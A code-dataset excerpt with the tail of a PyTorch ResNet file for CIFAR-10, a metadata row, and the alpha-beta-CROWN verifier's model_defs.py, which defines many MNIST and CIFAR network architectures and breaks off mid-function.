self.Conv4_4 = ResBlock(256, kernel_size=3, padding=1)
self.Conv4_5 = ResBlock(256, kernel_size=3, padding=1)
self.LastConv = IncreaseChannel_ResBlock(256,512, kernel_size=3, stride=2, padding=1)
self.Conv5_1 = ResBlock(512, kernel_size=3, padding=1)
self.Conv5_2 = ResBlock(512, kernel_size=3, padding=1)
self.GAP = nn.AvgPool2d(4)
self.Dense = nn.Linear(512,10)
def forward(self, x):
x = self.FirstConv(x)
x = self.Conv2_1(x)
x = self.Conv2_2(x)
x = self.SecondConv(x)
x = self.Conv3_1(x)
x = self.Conv3_2(x)
x = self.Conv3_3(x)
x = self.ThirdConv(x)
x = self.Conv4_1(x)
x = self.Conv4_2(x)
x = self.Conv4_3(x)
x = self.Conv4_4(x)
x = self.Conv4_5(x)
x = self.LastConv(x)
x = self.Conv5_1(x)
x = self.Conv5_2(x)
x = self.GAP(x)
x = x.view(-1,512)
x = self.Dense(x)
return x
class ResNet50_forCIFAR10(nn.Module):
def __init__(self):
super(ResNet50_forCIFAR10, self).__init__()
self.FirstConv = IncreaseChannel_ResBottleneck(3, 256, kernel_size=3, stride=1, padding=1, isFirstConv=True)
self.Conv2_1 = ResBottleneck(256, kernel_size=3, padding=1)
self.Conv2_2 = ResBottleneck(256, kernel_size=3, padding=1)
self.SecondConv = IncreaseChannel_ResBottleneck(256, 512, kernel_size=3, stride=2, padding=1)
self.Conv3_1 = ResBottleneck(512, kernel_size=3, padding=1)
self.Conv3_2 = ResBottleneck(512, kernel_size=3, padding=1)
self.Conv3_3 = ResBottleneck(512, kernel_size=3, padding=1)
self.ThirdConv = IncreaseChannel_ResBottleneck(512, 1024, kernel_size=3, stride=2, padding=1)
self.Conv4_1 = ResBottleneck(1024, kernel_size=3, padding=1)
self.Conv4_2 = ResBottleneck(1024, kernel_size=3, padding=1)
self.Conv4_3 = ResBottleneck(1024, kernel_size=3, padding=1)
self.Conv4_4 = ResBottleneck(1024, kernel_size=3, padding=1)
self.Conv4_5 = ResBottleneck(1024, kernel_size=3, padding=1)
self.LastConv = IncreaseChannel_ResBottleneck(1024, 2048, kernel_size=3, stride=2, padding=1)
self.Conv5_1 = ResBottleneck(2048, kernel_size=3, padding=1)
self.Conv5_2 = ResBottleneck(2048, kernel_size=3, padding=1)
self.GAP = nn.AvgPool2d(4)
self.Dense = nn.Linear(2048,10)
def forward(self, x):
x = self.FirstConv(x)
x = self.Conv2_1(x)
x = self.Conv2_2(x)
x = self.SecondConv(x)
x = self.Conv3_1(x)
x = self.Conv3_2(x)
x = self.Conv3_3(x)
x = self.ThirdConv(x)
x = self.Conv4_1(x)
x = self.Conv4_2(x)
x = self.Conv4_3(x)
x = self.Conv4_4(x)
x = self.Conv4_5(x)
x = self.LastConv(x)
x = self.Conv5_1(x)
x = self.Conv5_2(x)
x = self.GAP(x)
x = x.view(-1,2048)
x = self.Dense(x)
return x
| 29.86052 | 120 | 0.583406 | 1,772 | 12,631 | 3.99605 | 0.066591 | 0.096032 | 0.04152 | 0.083886 | 0.895919 | 0.859624 | 0.837876 | 0.800593 | 0.755119 | 0.692275 | 0 | 0.061054 | 0.298472 | 12,631 | 422 | 121 | 29.93128 | 0.738066 | 0.01148 | 0 | 0.751799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064748 | false | 0 | 0.010791 | 0 | 0.140288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60ded3bd5fa41b5db3cc63e17fb28129b3b5047a | 39,100 | py | Python | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | complete_verifier/model_defs.py | nhamlv-55/alpha-beta-CROWN | c299ce432acb30ab0203f58c591d91e3e39439c2 | [
"BSD-3-Clause"
] | null | null | null | #########################################################################
## This file is part of the alpha-beta-CROWN verifier ##
## ##
## Copyright (C) 2021, Huan Zhang <huan@huan-zhang.com> ##
## Kaidi Xu <xu.kaid@northeastern.edu> ##
## Shiqi Wang <sw3215@columbia.edu> ##
## Zhouxing Shi <zshi@cs.ucla.edu> ##
## Yihan Wang <yihanwang@ucla.edu> ##
## ##
## This program is licenced under the BSD 3-Clause License, ##
## contained in the LICENCE file in this directory. ##
## ##
#########################################################################
import torch
from torch.nn import functional as F
import torch.nn as nn
from collections import OrderedDict
import math
import importlib
from functools import partial
########################################
# Defined the model architectures
########################################
class Flatten(nn.Module):
def forward(self, x):
return x.reshape(x.size(0), -1)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1, bn=True, kernel=3):
super(BasicBlock, self).__init__()
self.bn = bn
if kernel == 3:
# can only do planes 16, block1
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=(not self.bn))
if self.bn:
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=1, padding=1, bias=(not self.bn))
elif kernel == 2:
# can do planes 32
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=2, stride=stride, padding=1, bias=(not self.bn))
if self.bn:
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=2,
stride=1, padding=0, bias=(not self.bn))
elif kernel == 1:
# can only do planes 16, block1
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=1, stride=stride, padding=0, bias=(not self.bn))
if self.bn:
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=1,
stride=1, padding=0, bias=(not self.bn))
else:
exit("kernel not supported!")
if self.bn:
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
if self.bn:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes,
kernel_size=1, stride=stride, bias=(not self.bn)),
nn.BatchNorm2d(self.expansion*planes)
)
else:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes,
kernel_size=1, stride=stride, bias=(not self.bn)),
)
def forward(self, x):
if self.bn:
out = F.relu(self.bn1(self.conv1(x)))
# print("residual relu:", out.shape, out[0].view(-1).shape)
out = self.bn2(self.conv2(out))
else:
out = F.relu(self.conv1(x))
# print("residual relu:", out.shape, out[0].view(-1).shape)
out = self.conv2(out)
out += self.shortcut(x)
out = F.relu(out)
# print("residual relu:", out.shape, out[0].view(-1).shape)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10, in_planes=64):
super(ResNet, self).__init__()
self.in_planes = in_planes
self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.layer1 = self._make_layer(block, in_planes, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, in_planes * 2, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, in_planes * 4, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, in_planes * 8, num_blocks[3], stride=2)
self.linear = nn.Linear(in_planes * 8 * block.expansion, num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ResNet18(in_planes=2):
return ResNet(BasicBlock, [2, 2, 2, 2], in_planes=in_planes)
class CResNet5(nn.Module):
def __init__(self, block, num_blocks=2, num_classes=10, in_planes=64, bn=True, last_layer="avg"):
super(CResNet5, self).__init__()
self.in_planes = in_planes
self.bn = bn
self.last_layer = last_layer
self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
stride=2, padding=1, bias=not self.bn)
if self.bn:
self.bn1 = nn.BatchNorm2d(in_planes)
self.layer1 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
if self.last_layer == "avg":
self.avg2d = nn.AvgPool2d(4)
self.linear = nn.Linear(in_planes * 8 * block.expansion, num_classes)
elif self.last_layer == "dense":
self.linear1 = nn.Linear(in_planes * 8 * block.expansion * 16, 100)
self.linear2 = nn.Linear(100, num_classes)
else:
exit("last_layer type not supported!")
def _make_layer(self, block, planes, num_blocks, stride, bn, kernel):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride, bn, kernel))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
if self.bn:
out = F.relu(self.bn1(self.conv1(x)))
else:
out = F.relu(self.conv1(x))
# print("conv1 relu", out.shape, out[0].view(-1).shape)
out = self.layer1(out)
# print("layer1", out.shape)
if self.last_layer == "avg":
out = self.avg2d(out)
# print("avg", out.shape)
out = out.view(out.size(0), -1)
# print("view", out.shape)
out = self.linear(out)
# print("output", out.shape)
elif self.last_layer == "dense":
out = out.view(out.size(0), -1)
# print("view", out.shape)
out = F.relu(self.linear1(out))
# print("linear1 relu", out.shape, out[0].view(-1).shape)
out = self.linear2(out)
# print("output", out.shape)
return out
class CResNet7(nn.Module):
def __init__(self, block, num_blocks=2, num_classes=10, in_planes=64, bn=True, last_layer="avg"):
super(CResNet7, self).__init__()
self.in_planes = in_planes
self.bn = bn
self.last_layer = last_layer
self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
stride=2, padding=1, bias=not self.bn)
if self.bn:
self.bn1 = nn.BatchNorm2d(in_planes)
self.layer1 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
self.layer2 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
if self.last_layer == "avg":
self.avg2d = nn.AvgPool2d(4)
self.linear = nn.Linear(in_planes * 2 * block.expansion, num_classes)
elif self.last_layer == "dense":
self.linear1 = nn.Linear(in_planes * 2 * block.expansion * 16, 100)
self.linear2 = nn.Linear(100, num_classes)
else:
exit("last_layer type not supported!")
def _make_layer(self, block, planes, num_blocks, stride, bn, kernel):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride, bn, kernel))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
if self.bn:
out = F.relu(self.bn1(self.conv1(x)))
else:
out = F.relu(self.conv1(x))
# print("conv1 relu", out.shape, out[0].view(-1).shape)
out = self.layer1(out)
# print("layer1", out.shape)
out = self.layer2(out)
# print("layer2", out.shape)
if self.last_layer == "avg":
out = self.avg2d(out)
# print("avg", out.shape)
out = out.view(out.size(0), -1)
# print("view", out.shape)
out = self.linear(out)
# print("output", out.shape)
elif self.last_layer == "dense":
out = out.view(out.size(0), -1)
# print("view", out.shape)
out = F.relu(self.linear1(out))
# print("linear1 relu", out.shape, out[0].view(-1).shape)
out = self.linear2(out)
# print("output", out.shape)
return out
def resnet4b():
return CResNet7(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="dense")
def resnet2b():
return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")
def cresnet5_16_dense_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=True, last_layer="dense")
def cresnet5_16_avg_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=True, last_layer="avg")
def cresnet5_8_dense_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="dense")
def cresnet5_8_avg_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="avg")
def cresnet5_4_dense_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="dense")
def cresnet5_4_avg_bn():
return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="avg")
def cresnet7_8_dense_bn():
return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="dense")
def cresnet7_8_avg_bn():
return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="avg")
def cresnet7_4_dense_bn():
return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="dense")
def cresnet7_4_avg_bn():
return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="avg")
def cresnet5_16_dense():
return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="dense")
def cresnet5_16_avg():
return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="avg")
def cresnet5_8_dense():
return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")
def cresnet5_8_avg():
return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="avg")
def cresnet5_4_dense():
return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="dense")
def cresnet5_4_avg():
return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="avg")
def cresnet7_8_dense():
return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")
def cresnet7_8_avg():
return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="avg")
def cresnet7_4_dense():
return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="dense")
def cresnet7_4_avg():
return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="avg")
class Dense(nn.Module):
def __init__(self, *Ws):
super(Dense, self).__init__()
self.Ws = nn.ModuleList(list(Ws))
if len(Ws) > 0 and hasattr(Ws[0], 'out_features'):
self.out_features = Ws[0].out_features
def forward(self, *xs):
xs = xs[-len(self.Ws):]
out = sum(W(x) for x, W in zip(xs, self.Ws) if W is not None)
return out
class DenseSequential(nn.Sequential):
def forward(self, x):
xs = [x]
for module in self._modules.values():
if 'Dense' in type(module).__name__:
xs.append(module(*xs))
else:
xs.append(module(xs[-1]))
return xs[-1]
def model_resnet(in_ch=3, in_dim=32, width=1, mult=16, N=1):
def block(in_filters, out_filters, k, downsample):
if not downsample:
k_first = 3
skip_stride = 1
k_skip = 1
else:
k_first = 4
skip_stride = 2
k_skip = 2
return [
Dense(nn.Conv2d(in_filters, out_filters, k_first, stride=skip_stride, padding=1)),
nn.ReLU(),
Dense(nn.Conv2d(in_filters, out_filters, k_skip, stride=skip_stride, padding=0),
None,
nn.Conv2d(out_filters, out_filters, k, stride=1, padding=1)),
nn.ReLU()
]
conv1 = [nn.Conv2d(in_ch, mult, 3, stride=1, padding=3 if in_dim == 28 else 1), nn.ReLU()]
conv2 = block(mult, mult * width, 3, False)
for _ in range(N):
conv2.extend(block(mult * width, mult * width, 3, False))
conv3 = block(mult * width, mult * 2 * width, 3, True)
for _ in range(N - 1):
conv3.extend(block(mult * 2 * width, mult * 2 * width, 3, False))
conv4 = block(mult * 2 * width, mult * 4 * width, 3, True)
for _ in range(N - 1):
conv4.extend(block(mult * 4 * width, mult * 4 * width, 3, False))
layers = (
conv1 +
conv2 +
conv3 +
conv4 +
[Flatten(),
nn.Linear(mult * 4 * width * 8 * 8, 1000),
nn.ReLU(),
nn.Linear(1000, 10)]
)
model = DenseSequential(
*layers
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
return model
def mnist_fc():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 10),
nn.ReLU(),
nn.Linear(10, 10),
nn.ReLU(),
nn.Linear(10, 10)
)
return model
def cifar_model_base():
# cifar base
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1024, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_model_deep():
# cifar deep
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 8, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8, 8, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8, 8, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*8*8, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_model_wide():
# cifar wide
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(32*8*8,100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cnn_4layer():
# cifar_cnn_a
return cifar_model_wide()
def cnn_4layer_adv():
# cifar_cnn_a_adv
return cifar_model_wide()
def cnn_4layer_adv4():
# cifar_cnn_a_adv
return cifar_model_wide()
def cnn_4layer_mix4():
# cifar_cnn_a_mix4
return cifar_model_wide()
def cnn_4layer_b():
# cifar_cnn_b
return nn.Sequential(
nn.ZeroPad2d((1,2,1,2)),
nn.Conv2d(3, 32, (5,5), stride=2, padding=0),
nn.ReLU(),
nn.Conv2d(32, 128, (4,4), stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8192, 250),
nn.ReLU(),
nn.Linear(250, 10),
)
def cnn_4layer_b4():
# cifar_cnn_b4
return cnn_4layer_b()
def mnist_cnn_4layer():
# mnist_cnn_a
return nn.Sequential(
nn.Conv2d(1, 16, (4,4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, (4,4), stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1568, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
def cifar_conv_small():
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2, padding=0),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=0),
nn.ReLU(),
Flatten(),
nn.Linear(32*6*6,100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv_big():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*8*8,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def cifar_marabou_small():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2,),
nn.ReLU(),
Flatten(),
nn.Linear(576, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU(),
nn.Linear(64, 10)
)
return model
def cifar_marabou_medium():
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2,),
nn.ReLU(),
Flatten(),
nn.Linear(1152, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU(),
nn.Linear(64, 10)
)
return model
def cifar_marabou_large():
model = nn.Sequential(
nn.Conv2d(3, 32, 4, stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, 4, stride=2,),
nn.ReLU(),
Flatten(),
nn.Linear(2304, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU(),
nn.Linear(64, 10)
)
return model
def mnist_conv_small():
model = nn.Sequential(
nn.Conv2d(1, 16, 4, stride=2, padding=0),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=0),
nn.ReLU(),
Flatten(),
nn.Linear(32*5*5,100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_conv_big():
model = nn.Sequential(
nn.Conv2d(1, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*7*7,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_6_100():
model = nn.Sequential(
Flatten(),
nn.Linear(784,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100, 10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_9_100():
model = nn.Sequential(
Flatten(),
nn.Linear(784,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_6_200():
model = nn.Sequential(
Flatten(),
nn.Linear(784,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_9_200():
model = nn.Sequential(
Flatten(),
nn.Linear(784,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_fc1():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 10)
)
return model
def mnist_fc2():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_fc3():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_fc_3_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_4_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_5_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_6_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_7_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_madry_secret():
model = nn.Sequential(
nn.Conv2d(1, 32, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
return model
def cifar_conv1():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1024, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv2():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(512, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv3():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(2048, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv4():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def cifar_conv5():
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(2048, 1024),
nn.ReLU(),
nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def cifar_conv6():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def MadryCNN():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_one_maxpool():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_no_maxpool():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(32, 64, 5, stride=2, padding=2),
nn.ReLU(),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_tiny():
return nn.Sequential(
nn.Conv2d(1, 4, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(4, 8, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
def MadryCNN_one_maxpool_tiny():
return nn.Sequential(
nn.Conv2d(1, 4, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(4, 8, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
def MadryCNN_no_maxpool_tiny():
return nn.Sequential(
